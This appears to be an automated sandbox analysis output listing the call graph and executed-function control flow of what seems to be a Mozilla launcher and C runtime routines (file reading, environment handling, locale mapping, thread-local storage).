51505->51506 51507 6e0bc28c 51506->51507 51508 6e0b10e0 __get_errno 3 API calls 51507->51508 51509 6e0bc29c 51508->51509 51509->51501 51510 6e0a8980 51511 6e0a898c __Stoull 51510->51511 51512 6e0e32b7 __doserrno _errno 51511->51512 51516 6e0a8998 51511->51516 51513 6e0e331c 51512->51513 51514 6e0e3304 __doserrno _errno 51515 6e0e3317 51514->51515 51563 6e107f60 19 API calls __get_errno 51515->51563 51516->51514 51518 6e0a89dc EnterCriticalSection 51516->51518 51519 6e0e32cc __doserrno _errno 51516->51519 51520 6e0e32e1 _errno __doserrno 51518->51520 51521 6e0a8a02 51518->51521 51519->51515 51520->51514 51524 6e0a8b33 51521->51524 51523 6e0a8a0f 51525 6e0a8b54 51524->51525 51526 6e0e33cb __doserrno _errno 51524->51526 51527 6e0e3609 __doserrno _errno 51525->51527 51531 6e0e33e3 __doserrno _errno 51525->51531 51532 6e0a8bc5 51525->51532 51560 6e0a8c66 51525->51560 51528 6e0e3621 51526->51528 51529 6e0e361c 51527->51529 51567 6e107f60 19 API calls __get_errno 51529->51567 51531->51529 51533 6e0a8be4 51532->51533 51534 6e0e3403 __doserrno _errno 51532->51534 51537 6e0e3423 51532->51537 51533->51534 51562 6e0a8bec _isatty 51533->51562 51564 6e107f60 19 API calls __get_errno 51534->51564 51540 6e0b36c0 __mbsupr 12 API calls 51537->51540 51538 6e0a8c15 51543 6e0a8c1a ReadFile 51538->51543 51539 6e0e353b 51539->51538 51542 6e0e3555 GetConsoleMode 51539->51542 51541 6e0e3434 51540->51541 51544 6e0b10e0 __get_errno 3 API calls 51541->51544 51542->51538 51546 6e0e356c 51542->51546 51545 6e0e35dc GetLastError 51543->51545 51551 6e0a8c39 51543->51551 51547 6e0e343e 51544->51547 51549 6e0e35e9 _errno __doserrno 51545->51549 51545->51551 51546->51543 51548 6e0e3577 ReadConsoleW 51546->51548 51552 6e0b10e0 __get_errno 3 API calls 51547->51552 51548->51551 51553 6e0e3594 GetLastError 51548->51553 51549->51551 51550 6e0e3602 51550->51527 51551->51545 51551->51550 51556 6e0a8c60 51551->51556 51566 6e0a4dfb __doserrno _errno 51551->51566 51555 6e0e3446 51552->51555 51553->51551 51558 6e0e346a 51555->51558 51559 6e0e344f _errno __doserrno 51555->51559 51557 6e0b10e0 __get_errno 3 API calls 51556->51557 51557->51560 51565 6e0bc0d3 _get_osfhandle _errno 51558->51565 51559->51551 51560->51523 51562->51538 51562->51539 51563->51513 51564->51551 51565->51562 51566->51551 51567->51528 51568 6e0b5fb6 GetStartupInfoW 51569 6e0e8d3f 51568->51569 51570 6e0b5fd3 51568->51570 51569->51570 51574 6e0b5fdc 51569->51574 51572 6e0e8d96 GetFileType 51573 6e0e8d69 51572->51573 51573->51570 51573->51572 51575 6e0b5fe8 __Stoull 51574->51575 51576 6e0b5ff6 EnterCriticalSection 51575->51576 51577 6e0e8dd9 _errno 51575->51577 51584 6e0b6010 51576->51584 51599 6e107f60 19 API calls __get_errno 51577->51599 51579 6e0b6040 51598 6e0b6054 LeaveCriticalSection 51579->51598 51580 6e0e8de8 51580->51580 51583 6e0b604c 51583->51573 51584->51579 51585 6e0b61e0 51584->51585 51586 6e0b0cb0 __get_errno 12 API calls 51585->51586 51591 6e0b61fc 51586->51591 51587 6e0b628b 51588 6e0b10e0 __get_errno 3 API calls 51587->51588 51590 6e0b6297 51588->51590 51589 6e0e8e21 InitializeCriticalSectionAndSpinCount 51593 6e0e8e35 GetProcAddress 51589->51593 51590->51584 51591->51587 51591->51589 51592 6e0e8df5 51591->51592 51592->51593 51594 6e0e8e10 51592->51594 51596 6e0b5eb9 __Stoull 4 API calls 51592->51596 51593->51594 51595 6e0e8e47 51593->51595 51594->51589 51595->51589 51597 6e0e8e5b 51595->51597 51596->51592 51597->51597 51598->51583 51599->51580 51600 6e0a3fa0 51601 6e0dfc9b _errno 51600->51601 51602 6e0a3fb1 51600->51602 51619 6e107f60 19 API calls __get_errno 51601->51619 51604 6e0a3fb7 51602->51604 51607 6e0a8a48 51602->51607 51606 6e0dfcab 51608 6e0e3324 _errno 51607->51608 51611 6e0a8a5b 51607->51611 51625 6e107f60 19 API calls __get_errno 51608->51625 51610 6e0a8adf 51610->51604 51611->51610 51612 6e0a8aa1 _fileno _read 51611->51612 51620 6e0a8e37 51611->51620 51612->51610 51614 6e0a8acf 51612->51614 51614->51610 51616 6e0e3345 _fileno 51614->51616 51615 6e0a8b09 51615->51612 51616->51610 51617 6e0e3353 _fileno 51616->51617 51617->51610 51618 6e0e3361 _fileno _fileno 51617->51618 51618->51610 51619->51606 51621 6e0b36c0 __mbsupr 12 API calls 51620->51621 51622 6e0a8e4f 51621->51622 51623 6e0b10e0 __get_errno 3 API calls 51622->51623 51624 6e0a8e59 51623->51624 51624->51615 51625->51610 51626 6e0b43f5 51627 6e0b440b 51626->51627 51633 6e0b6a93 51627->51633 51629 6e0b44d0 __Stoull 51630 6e0b41e0 HeapFree GetLastError _errno __Stoull 51631 6e0b441e __Stoull 51630->51631 51631->51629 51631->51630 51632 6e0af6c0 8 API calls __get_errno 51631->51632 51632->51631 51634 6e0b6bbf 51633->51634 51637 6e0b6abe 51633->51637 51640 6e0b6b85 51634->51640 51668 6e0b77b1 33 API calls 2 library calls 51634->51668 51638 6e0e8f7b wcspbrk 51637->51638 51639 6e0b6aea 51637->51639 51647 6e0b6b7a 51637->51647 51638->51640 51641 6e0e8f98 __Stoull 51638->51641 51639->51640 51639->51647 51667 6e0b77b1 33 API calls 2 library calls 51639->51667 51640->51631 51641->51638 51641->51640 51642 6e0e9006 wcscspn 51641->51642 51644 6e0e903d wcsncpy_s 51641->51644 51646 6e0e90be 51641->51646 51641->51647 51669 6e0b77b1 33 API calls 2 library calls 51641->51669 51642->51641 51644->51641 51645 6e0e90c3 _invoke_watson 51644->51645 51645->51640 51646->51645 51647->51640 51649 6e0b6907 51647->51649 51650 6e0b36c0 __mbsupr 12 API calls 51649->51650 51655 6e0b6924 51650->51655 51651 6e0b6a2d 51651->51640 51652 6e0b6969 wcscat_s 51653 6e0e8f3e _invoke_watson _invoke_watson 51652->51653 51652->51655 51654 6e0e8f58 51653->51654 51654->51640 51655->51651 51655->51652 51656 6e0b69fc 51655->51656 51657 6e0e8ece 51656->51657 51658 6e0b6a06 51656->51658 51660 6e0b10e0 __get_errno 3 API calls 51657->51660 51661 6e0e8ee8 51657->51661 51659 6e0b10e0 __get_errno 3 API calls 51658->51659 51663 6e0b6a0c 51659->51663 51660->51661 51662 6e0b10e0 __get_errno 3 API calls 51661->51662 51661->51663 51662->51663 51664 6e0b10e0 __get_errno 3 API calls 51663->51664 51666 6e0b6a1b 51663->51666 51664->51666 51665 6e0b10e0 __get_errno 3 API calls 51665->51651 51666->51651 51666->51665 51667->51639 51668->51640 51669->51641 51670 135619c 51671 13561a8 51670->51671 51689 13563a4 51671->51689 51674 13561af 51675 13561d8 51674->51675 51781 1356b21 6 API calls 51674->51781 51676 1356225 51675->51676 51677 13561dc _initterm_e 51675->51677 51680 1356278 __p___wargv __p___argc _get_initial_wide_environment 51676->51680 51684 1356270 _register_thread_local_exe_atexit_callback 51676->51684 51678 1356208 _initterm 51677->51678 51679 13561f7 51677->51679 51678->51676 51693 1351550 51680->51693 51682 1356295 51782 1356c3c GetModuleHandleW 51682->51782 51684->51680 51685 135629f 51686 13562a9 51685->51686 51687 13562a3 exit 51685->51687 51686->51679 51688 13562ad _cexit 51686->51688 51687->51686 51688->51679 51690 13563ad 51689->51690 51783 1356dae IsProcessorFeaturePresent 51690->51783 51692 13563b9 51692->51674 51724 1351587 51693->51724 51694 13516c6 getenv __p__environ ?Now@TimeStamp@mozilla@@CA?AV12@_N 51695 13516f6 51694->51695 51696 1351715 ?DllBlocklist_Initialize@@YAXI 51694->51696 51699 135170c 51695->51699 51700 13576d1 _stricmp 51695->51700 51701 135174a wcscpy_s 51696->51701 51702 1351729 GetModuleFileNameW 51696->51702 51697 13576ba 51697->51700 51698 13576a4 51698->51682 51699->51696 51705 13576f1 _stricmp 51699->51705 51703 1357709 ?DllBlocklist_Initialize@@YAXI IsSandboxedProcess 51700->51703 51704 13576ec 51700->51704 51707 135176c WideCharToMultiByte strdup 51701->51707 51768 1357726 51701->51768 51706 1351743 51702->51706 51702->51768 51708 135771d 51703->51708 51709 1357730 51703->51709 51704->51696 51705->51696 51705->51703 51706->51701 51710 13517aa 51707->51710 51707->51768 51805 1375211 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx 51708->51805 51806 135ab18 44 API calls 51709->51806 51784 1351060 51710->51784 51713 135ab8d 11 API calls 51717 13579bb 51713->51717 51715 1357735 51715->51717 51807 135acce 12 API calls 51715->51807 51716 1357722 51716->51709 51716->51768 51720 13517f3 free 51727 1351828 getenv 51720->51727 51721 1351bb6 51804 1356315 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 51721->51804 51723 135776b 51793 135ab8d 51723->51793 51724->51694 51724->51697 51724->51698 51729 1351863 51727->51729 51730 13577a8 51727->51730 51732 13577b6 _stricmp 51729->51732 51733 1351882 51729->51733 51740 13518b3 51729->51740 51731 135188b 51730->51731 51730->51732 51736 13518aa 51731->51736 51737 13578a1 _stricmp 51731->51737 51731->51740 51732->51731 51735 13577ee 51732->51735 51733->51731 51739 13577d6 _stricmp 51733->51739 51743 13577f7 51735->51743 51808 135a9c9 __stdio_common_vsprintf 51735->51808 51736->51740 51741 13578c1 _stricmp 51736->51741 51737->51740 51744 13578d9 51737->51744 51738 1351c5e 51738->51682 51739->51731 51739->51735 51775 1351a35 51740->51775 51802 135670c EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx 51740->51802 51741->51740 51741->51744 51748 135ab8d 11 API calls 51743->51748 51809 13751ce 29 API calls 51744->51809 51746 135783e strdup _putenv 51746->51740 51750 1357859 51746->51750 51751 1357808 51748->51751 51753 135ab8d 11 API calls 51750->51753 51751->51682 51753->51721 51768->51713 51778 1351ba5 51775->51778 51803 135670c EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx 51775->51803 51778->51721 51778->51743 51781->51674 51782->51685 51783->51692 51785 1351077 strrchr 51784->51785 51788 135110f 51784->51788 51786 135108e malloc memcpy 51785->51786 51785->51788 51810 1351120 51786->51810 51788->51720 51788->51723 51789 13510c0 51789->51788 51790 13510c8 GetProcAddress 51789->51790 51790->51788 51791 13510e2 51790->51791 51791->51788 51792 1351105 free 51791->51792 51792->51788 51794 135ab9a 51793->51794 51795 135abc2 __stdio_common_vsnprintf_s MultiByteToWideChar LoadLibraryW 51794->51795 51796 135ac2b 51795->51796 51797 135abff GetProcAddress 51795->51797 51839 1356315 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 51796->51839 51799 135ac24 FreeLibrary 51797->51799 51800 135ac0f MessageBoxW 51797->51800 51799->51796 51800->51799 51801 1357799 free 51801->51717 51804->51738 51805->51716 51806->51715 51807->51721 51808->51746 51809->51721 51811 135112d 51810->51811 51812 1351413 51811->51812 51813 135141f 51811->51813 51815 1357426 51811->51815 51816 1351185 memcpy getenv 51811->51816 51837 1356933 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 51812->51837 51838 13752c0 FreeLibrary 51813->51838 51815->51789 51816->51813 51819 13511d4 MultiByteToWideChar _wfopen 51816->51819 51818 1357403 fclose 51820 1351402 51818->51820 51819->51815 51821 1351219 fgets 51819->51821 51836 1356315 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 51820->51836 51823 13513f6 fclose 51821->51823 51827 1351240 51821->51827 51823->51820 51824 135140f 51824->51789 51825 13513d8 fgets 51825->51823 51825->51827 51826 135741c fclose 51826->51815 51827->51812 51827->51825 51827->51826 51828 13512cd MultiByteToWideChar CreateFileW 51827->51828 51833 13565a1 4 API calls 51827->51833 51829 1351315 SetFilePointerEx 51828->51829 51830 1351393 LoadLibraryExW 51828->51830 51831 135138c CloseHandle 51829->51831 51835 1351340 51829->51835 51830->51813 51830->51827 51831->51830 51832 1351342 ReadFile 51834 1351375 SetFilePointerEx 51832->51834 51832->51835 51833->51827 51834->51831 51835->51832 51835->51834 51836->51824 51837->51813 51838->51818 51839->51801 51840 6e10b770 51843 6e0a8ec6 51840->51843 51842 6e10b782 51844 6e0a8ed2 __Stoull 51843->51844 51845 6e0e368b _errno 51844->51845 51847 6e0a8ef4 51844->51847 51869 6e107f60 19 API calls __get_errno 51845->51869 51849 6e0e36af _errno 51847->51849 51858 6e0a935e 51847->51858 51848 6e0e369b 51848->51849 51849->51848 51851 6e0a8f05 51852 6e0e369d _errno 51851->51852 51853 6e0a8f17 51851->51853 51852->51848 51864 6e0a90a0 51853->51864 51855 6e0a8f2b 51868 6e0a8f46 LeaveCriticalSection 51855->51868 51857 6e0a8f3e 51857->51842 51870 6e0d56d0 51858->51870 51860 6e0a936a EnterCriticalSection 51861 6e0a9389 51860->51861 51871 6e0a93bd LeaveCriticalSection 51861->51871 51863 6e0a93b5 51863->51851 51865 6e0a90b8 51864->51865 51866 6e0a90df 51865->51866 51872 6e0a9126 51865->51872 51866->51855 51868->51857 51869->51848 51870->51860 51871->51863 51873 6e0a9132 __Stoull 51872->51873 51874 6e0e383d _errno 51873->51874 51876 6e0a915b 51873->51876 51913 6e107f60 19 API calls __get_errno 51874->51913 51882 6e0a5ca0 51876->51882 51877 6e0e384c 51879 6e0a9179 51912 6e0a919e LeaveCriticalSection 51879->51912 51881 6e0a918d 51881->51866 51883 6e0a5ccb 51882->51883 51884 6e0e0918 __doserrno 51883->51884 51885 6e0a5ce5 51883->51885 51887 6e0e0927 __doserrno _errno 51884->51887 51914 6e0a5eef 51885->51914 51891 6e0a5eaf 51887->51891 51888 6e0a5cea 51888->51887 51889 6e0a5cf4 CreateFileW 51888->51889 51890 6e0a5d5b GetFileType 51889->51890 51889->51891 51893 6e0e098a GetLastError 51890->51893 51901 6e0a5d6a 51890->51901 51892 6e0a5ebb GetLastError 51891->51892 51894 6e0e094b CreateFileW 51891->51894 51929 6e0a4dfb __doserrno _errno 51892->51929 51930 6e0a4dfb __doserrno _errno 51893->51930 51894->51890 51897 6e0e0985 51894->51897 51897->51892 51898 6e0a5ee1 _errno 51903 6e0a5ea6 51898->51903 51899 6e0e0999 CloseHandle 51899->51898 51900 6e0e09c1 _errno 51899->51900 51900->51898 51902 6e0a5dda 51901->51902 51901->51903 51927 6e0a62bf 47 API calls 51901->51927 51902->51903 51928 6e0a61a8 50 API calls 51902->51928 51903->51879 51906 6e0a5e06 51906->51903 51907 6e0e09f3 CloseHandle CreateFileW 51906->51907 51908 6e0e0a59 51907->51908 51909 6e0e0a27 GetLastError 51907->51909 51908->51903 51931 6e0a4dfb __doserrno _errno 51909->51931 51911 6e0e0a34 51911->51898 51912->51881 51913->51877 51932 6e0d56d0 51914->51932 51916 6e0a5efb EnterCriticalSection 51921 6e0a5f11 51916->51921 51917 6e0e0a76 51919 6e0b61e0 17 API calls 51917->51919 51920 6e0e0a7b 51919->51920 51923 6e0e0a8a EnterCriticalSection 51920->51923 51926 6e0a5f5e 51920->51926 51921->51917 51924 6e0a5f4d EnterCriticalSection 51921->51924 51921->51926 51922 6e0a5f9d 51922->51888 51925 6e0e0ac4 LeaveCriticalSection 51923->51925 51924->51925 51924->51926 51933 6e0a5fa5 LeaveCriticalSection 51926->51933 51927->51902 51928->51906 51929->51898 51930->51899 51931->51911 51932->51916 51933->51922 51934 6e0ac070 51936 6e0ac085 51934->51936 51935 6e0ac0cb 51936->51935 51939 6e0ac1f0 QueryPerformanceFrequency 51936->51939 51942 6e0ac320 IsProcessorFeaturePresent 51936->51942 51940 6e0ac21c 51939->51940 51941 6e0ac20a QueryPerformanceCounter 51939->51941 51940->51936 51941->51940 51942->51936 52053 6e0ae340 52054 6e0ae359 52053->52054 52055 6e0ae34b 52053->52055 52097 6e0c8f45 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 52054->52097 52060 6e0af270 52055->52060 52058 6e0ae354 52059 6e0ae35e 52059->52055 52061 6e0af28b GetLastError 52060->52061 52062 6e0af4cf 52060->52062 52065 6e0af2cb 52061->52065 52066 6e0af2a4 52061->52066 52063 6e0af509 52062->52063 52064 6e0af4d4 52062->52064 52103 6e0b682a 8 API calls 52063->52103 52067 6e0af4f6 52064->52067 52068 6e0af4d9 52064->52068 52075 6e0e6d34 TlsSetValue 52065->52075 52080 6e0af311 52065->52080 52096 6e0af449 52065->52096 52066->52065 52073 6e0e6d1a TlsGetValue 52066->52073 52098 6e0b60d7 52067->52098 52072 6e0af4b9 52068->52072 52102 6e0b32fb HeapFree GetLastError _errno TlsGetValue 52068->52102 52072->52058 52073->52096 52074 6e0af4fb 52074->52058 52087 6e0e6d3f 52075->52087 52076 6e0af50e 52076->52058 52077 6e0af4e3 52077->52058 52078 6e0e6d56 SetLastError 52081 6e0e6d62 TlsSetValue 52078->52081 52079 6e0af45a GetLastError 52083 6e0e6dac TlsGetValue 52079->52083 52084 6e0af48b 52079->52084 52080->52078 52085 6e0b0cb0 __get_errno 12 API calls 52080->52085 52081->52087 52082 6e0b10e0 __get_errno 3 API calls 52082->52087 52088 6e0e6db8 GetProcAddress 52083->52088 52086 6e0af493 SetLastError SetLastError 52084->52086 52091 6e0e6d7d 52084->52091 52090 6e0af32f 52085->52090 52086->52072 52087->52078 52087->52082 52092 6e0e6d98 52088->52092 52089 6e0b5eb9 __Stoull 4 API calls 52089->52091 52090->52081 52090->52087 52095 6e0b10e0 __get_errno 3 API calls 52090->52095 52091->52088 52091->52089 52091->52092 52092->52083 52094 6e0e6de1 52092->52094 52094->52094 52095->52096 52096->52078 52096->52079 52097->52059 52099 6e0b60dc 52098->52099 52100 6e0b60ef 52099->52100 52104 6e0b5a2d 52099->52104 52100->52074 52102->52077 52103->52076 52105 6e0b5a94 52104->52105 52106 6e0b5a4d 52104->52106 52105->52100 52106->52105 52108 6e0b5ab6 52106->52108 52111 6e0b3dc0 37 API calls 52106->52111 52112 6e0acab0 _initialize_onexit_table _initialize_onexit_table _initterm_e 52106->52112 52114 6e0b5c10 52106->52114 52108->52106 52117 6e0b5c30 6 API calls __Stoull 52108->52117 52111->52106 52113 6e0acaed 52112->52113 52113->52106 52118 6e0ac008 52114->52118 52116 6e0b5c17 52116->52106 52117->52108 52119 6e0ac033 52118->52119 52120 6e0ac056 TlsAlloc 52119->52120 52121 6e0ac03b 52119->52121 52120->52121 52121->52116 51943 6e0b606d 51944 6e0af6c0 __get_errno 8 API calls 51943->51944 51945 6e0b6077 51944->51945 51946 6e0b60bd 51945->51946 51954 6e0b3dc0 51945->51954 51950 6e0b60b6 51951 6e0b10e0 __get_errno 3 API calls 51950->51951 51951->51946 51952 6e0b608d 51952->51950 51953 6e0b10e0 __get_errno 3 API calls 51952->51953 51953->51950 51955 6e0b3dd2 51954->51955 51957 6e0b3ddb 51954->51957 51966 6e0b610d GetEnvironmentStringsW 51955->51966 51956 6e0b3e6f abort 51960 6e0e83e8 51956->51960 51957->51956 51959 6e0b3e42 51957->51959 51957->51960 51958 6e0b0cb0 __get_errno 12 API calls 51958->51960 51959->51955 51978 6e0b3e7c 51959->51978 51960->51956 51960->51958 51962 6e0b10e0 __get_errno 3 API calls 51960->51962 51963 6e0e8445 __get_errno 51960->51963 51962->51960 51964 6e0b10e0 __get_errno 3 API calls 51963->51964 51965 6e0e8453 51964->51965 51967 6e0b6124 51966->51967 51977 6e0b6173 51966->51977 51968 6e0b612b WideCharToMultiByte 51967->51968 51971 6e0b6146 51968->51971 51968->51977 51969 6e0b6178 FreeEnvironmentStringsW 51970 6e0b617f 51969->51970 51970->51952 51972 6e0b36c0 __mbsupr 12 API calls 51971->51972 51973 6e0b614c 51972->51973 51974 6e0b6153 WideCharToMultiByte 51973->51974 51975 6e0b6169 51973->51975 51974->51975 51976 6e0b10e0 __get_errno 3 API calls 51975->51976 51976->51977 51977->51969 51977->51970 51980 6e0b3e99 51978->51980 51979 6e0b3f75 51979->51959 51980->51979 51981 6e0b36c0 __mbsupr 12 API calls 51980->51981 51982 6e0b3ebc 51981->51982 51983 6e0b3f5f 51982->51983 51992 6e0acb30 51982->51992 51986 6e0b10e0 __get_errno 3 API calls 51983->51986 51985 6e0b3ee9 51987 6e0e8459 _errno 51985->51987 51988 6e0b3ef3 51985->51988 51986->51979 51987->51983 51989 6e0b3f0e 51988->51989 51990 6e0b10e0 __get_errno 3 API calls 51988->51990 51989->51983 51999 6e0b1b32 EnterCriticalSection __Stoull 51989->51999 51990->51989 51993 6e0acb4c 51992->51993 51994 6e0acb8f IsValidCodePage 51993->51994 51998 6e0acbf4 __Stoull 51993->51998 51995 6e0acba1 GetCPInfo 51994->51995 51994->51998 51996 6e0acbb4 __Stoull 51995->51996 51995->51998 51996->51998 52000 6e0acfd0 GetCPInfo 51996->52000 51998->51985 51998->51998 51999->51983 52001 6e0ad007 52000->52001 52007 6e0ad0dc 52000->52007 52001->52007 52008 6e0acc2b 52001->52008 52003 6e0ad04f 52021 6e0ad160 52003->52021 52005 6e0ad090 52006 6e0ad160 __mbsupr 24 API calls 52005->52006 52005->52007 52006->52007 52007->51998 52009 6e0acc49 52008->52009 52010 6e0acc54 MultiByteToWideChar 52009->52010 52012 6e0e5984 52009->52012 52011 6e0acc80 52010->52011 52020 6e0acd0d 52010->52020 52011->52012 52013 6e0e59a3 52011->52013 52015 6e0acca9 __mbsupr __Stoull 52011->52015 52014 6e0b36c0 __mbsupr 12 API calls 52012->52014 52014->52013 52016 6e0accd5 MultiByteToWideChar 52015->52016 52015->52020 52017 6e0accef GetStringTypeW 52016->52017 52018 6e0accfe 52016->52018 52017->52018 52019 6e0b10e0 __get_errno 3 API calls 52018->52019 52018->52020 52019->52020 52020->52003 52022 6e0ad196 52021->52022 52023 6e0ad184 __strncnt 52021->52023 52024 6e0ad1ad MultiByteToWideChar 52022->52024 52025 6e0ad1cb 52022->52025 52023->52022 52024->52025 52027 6e0ad381 52024->52027 52026 6e0b36c0 __mbsupr 12 API calls 52025->52026 52028 6e0ad1ef __mbsupr 52025->52028 52038 6e0ad36e 52025->52038 52026->52028 52027->52005 52031 6e0ad21a MultiByteToWideChar 52028->52031 52033 6e0ad233 52028->52033 52028->52038 52029 6e0b10e0 __get_errno 3 API calls 52029->52027 52030 6e0b5eb9 __Stoull 4 API calls 52030->52033 52031->52033 52031->52038 52032 6e0ad3af GetProcAddress 52034 6e0e5bb0 __mbsupr 52032->52034 52036 6e0ad3c5 52032->52036 52033->52030 52033->52032 52033->52034 52039 6e0ad25b 52033->52039 52035 6e0e5bd5 LCMapStringW 52034->52035 52035->52038 52037 6e0ad3dd 52036->52037 52036->52039 52037->52034 52038->52027 52038->52029 52039->52038 52040 6e0b36c0 __mbsupr 12 API calls 52039->52040 52041 6e0ad2b8 __mbsupr 52039->52041 52040->52041 52041->52038 52043 6e0e5c45 52041->52043 52045 6e0ad30e 52041->52045 52046 6e0e5c6f __mbsupr 52041->52046 52042 6e0b5eb9 __Stoull 4 API calls 52042->52043 52043->52042 52044 6e0e5c9d GetProcAddress 52043->52044 52043->52046 52044->52046 52045->52038 52049 6e0e5ccc WideCharToMultiByte 52045->52049 52050 6e0ad344 WideCharToMultiByte 52045->52050 52047 6e0e5c91 LCMapStringW 52046->52047 52048 6e0e5cc7 52046->52048 52047->52044 52048->52049 52049->52038 52051 6e0ad35f 52049->52051 52050->52038 52050->52051 52051->52038 52052 6e0b10e0 __get_errno 3 API calls 52051->52052 52052->52038 52122 6e0b7310 GetEnvironmentStringsW 52123 6e0b7357 52122->52123 52124 6e0b7320 52122->52124 52125 6e0b36c0 __mbsupr 12 API calls 52124->52125 52126 6e0b7335 52125->52126 52127 6e0b733c memcpy 52126->52127 52128 6e0b7347 52126->52128 52127->52128 52129 6e0b10e0 __get_errno 3 API calls 52128->52129 52130 6e0b734e FreeEnvironmentStringsW 52129->52130 52130->52123 52156 6e10b480 52159 6e10b2d0 52156->52159 52158 6e10b493 52160 6e10b2dc __Stoull 52159->52160 52161 6e10b2eb _errno 52160->52161 52163 6e10b314 52160->52163 52178 6e107f60 19 API calls __get_errno 52161->52178 52164 6e10b318 EnterCriticalSection 52163->52164 52168 6e10b2fb 52163->52168 52171 6e0a44db 52164->52171 52166 6e10b332 52169 6e10b343 _fgetc_nolock 52166->52169 52170 6e10b354 52166->52170 52168->52158 52169->52166 52169->52170 52179 6e10b38e LeaveCriticalSection 52170->52179 52172 6e0a4540 52171->52172 52173 6e0a44e6 _fileno 52171->52173 52172->52166 52176 6e0a44f9 52173->52176 52174 6e0e00d2 _errno 52180 6e107f60 19 API calls __get_errno 52174->52180 52176->52172 52176->52174 52177 6e0e00e2 52177->52166 52178->52168 52179->52168 52180->52177 52131 6e0d47d3 52136 6e0d502a 52131->52136 52133 6e0d47dd 52135 6e0d47e8 52133->52135 52141 6e0d5135 6 API calls 52133->52141 52142 6e0d4fa3 52136->52142 52139 6e0d5069 TlsAlloc 52140 6e0d505a 52139->52140 52140->52133 52141->52135 52143 6e0d4fcc 52142->52143 52144 6e0d4fd0 52142->52144 52143->52139 52143->52140 52144->52143 52149 6e0d4ed6 52144->52149 52147 6e0d4fea GetProcAddress 52147->52143 52148 6e0d4ffa 52147->52148 52148->52143 52154 6e0d4ee7 __Stoull 52149->52154 52150 6e0d4f91 52150->52143 52150->52147 52151 6e0d4f04 LoadLibraryExW 52152 6e0d4f1f GetLastError 52151->52152 52151->52154 52152->52154 52153 6e0d4f7a FreeLibrary 52153->52154 52154->52150 52154->52151 52154->52153 52155 6e0d4f52 LoadLibraryExW 52154->52155 52155->52154

    Executed Functions

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 268 6e0a8b33-6e0a8b4e 269 6e0a8b54-6e0a8b56 268->269 270 6e0e33cb-6e0e33de __doserrno _errno 268->270 271 6e0e3609-6e0e3616 __doserrno _errno 269->271 272 6e0a8b5c-6e0a8b62 269->272 273 6e0e3621 270->273 274 6e0e361c call 6e107f60 271->274 272->271 275 6e0a8b68-6e0a8b96 272->275 274->273 275->271 277 6e0a8b9c-6e0a8ba4 275->277 278 6e0e33e3-6e0e33f6 __doserrno _errno 277->278 279 6e0a8baa-6e0a8bac 277->279 278->274 280 6e0a8c95-6e0a8c97 279->280 281 6e0a8bb2-6e0a8bb7 279->281 283 6e0a8c69-6e0a8c6f 280->283 281->280 282 6e0a8bbd-6e0a8bbf 281->282 282->278 284 6e0a8bc5-6e0a8bde 282->284 285 6e0e341f-6e0e3421 284->285 286 6e0a8be4-6e0a8be6 284->286 289 6e0e3403-6e0e341a __doserrno _errno call 6e107f60 285->289 290 6e0e3423-6e0e342a 285->290 287 6e0a8bec-6e0a8c00 286->287 288 6e0e33fb-6e0e33fd 286->288 291 6e0e34a4-6e0e34ac 287->291 292 6e0a8c06-6e0a8c0f _isatty 287->292 288->287 288->289 301 6e0e35a1 289->301 294 6e0e342c 290->294 295 6e0e342e-6e0e344d call 6e0b36c0 call 6e0b10e0 * 2 290->295 291->292 299 6e0e34b2-6e0e34b4 291->299 296 6e0a8c15 292->296 297 6e0e353b-6e0e354f 292->297 294->295 333 6e0e346a-6e0e349b call 6e0bc0d3 295->333 334 6e0e344f-6e0e3465 _errno __doserrno 295->334 305 6e0a8c1a-6e0a8c33 ReadFile 296->305 297->296 304 6e0e3555-6e0e3566 GetConsoleMode 297->304 299->292 302 6e0e34ba-6e0e34d5 299->302 311 6e0e35a9-6e0e35b3 301->311 302->292 306 6e0e34db-6e0e34df 302->306 304->296 310 6e0e356c-6e0e3571 304->310 308 6e0a8c39-6e0a8c40 305->308 309 6e0e35dc-6e0e35e7 GetLastError 305->309 306->292 312 6e0e34e5-6e0e34e7 306->312 308->309 315 6e0a8c46 308->315 316 6e0e35e9-6e0e35fb _errno __doserrno 309->316 317 6e0e35fd-6e0e3600 309->317 310->305 314 6e0e3577-6e0e3592 ReadConsoleW 310->314 321 6e0a8c4a-6e0a8c5e 311->321 312->292 320 6e0e34ed-6e0e3508 312->320 314->311 323 6e0e3594 GetLastError 314->323 315->321 316->301 318 6e0e3602 317->318 319 6e0e359a-6e0e359c call 6e0a4dfb 317->319 318->271 319->301 320->292 327 6e0e350e-6e0e3512 320->327 325 6e0a8c60-6e0a8c67 call 6e0b10e0 321->325 326 6e0a8c70-6e0a8c75 321->326 323->319 325->283 329 6e0a8c7b-6e0a8c93 call 6e0a638b 326->329 330 6e0e35b8-6e0e35c8 326->330 327->292 331 6e0e3518-6e0e351a 327->331 329->325 335 6e0e35ca-6e0e35cf call 6e107188 330->335 336 6e0e35d1 call 6e106fc8 330->336 331->292 338 6e0e3520-6e0e3536 331->338 333->291 334->301 345 6e0e35d6 335->345 336->345 338->292 345->309
    APIs
    • _isatty.UCRTBASE(?), ref: 6E0A8C07
      • Part of subcall function 6E0ABE30: _errno.UCRTBASE(?,?,6E0ABB28,00000000,?,?,?,?,?,6E0A386E), ref: 6E0E53DC
      • Part of subcall function 6E0ABE30: _errno.UCRTBASE(?,?,6E0ABB28,00000000,?,?,?,?,?,6E0A386E), ref: 6E0E53E9
      • Part of subcall function 6E0ABE30: _invalid_parameter_noinfo.UCRTBASE(?,?,6E0ABB28,00000000,?,?,?,?,?,6E0A386E), ref: 6E0E53F4
    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,00000000), ref: 6E0A8C2B
    • __doserrno.UCRTBASE(?,?,?,?,00000000,?,6E0A3AE4,?,00000000), ref: 6E0E33CB
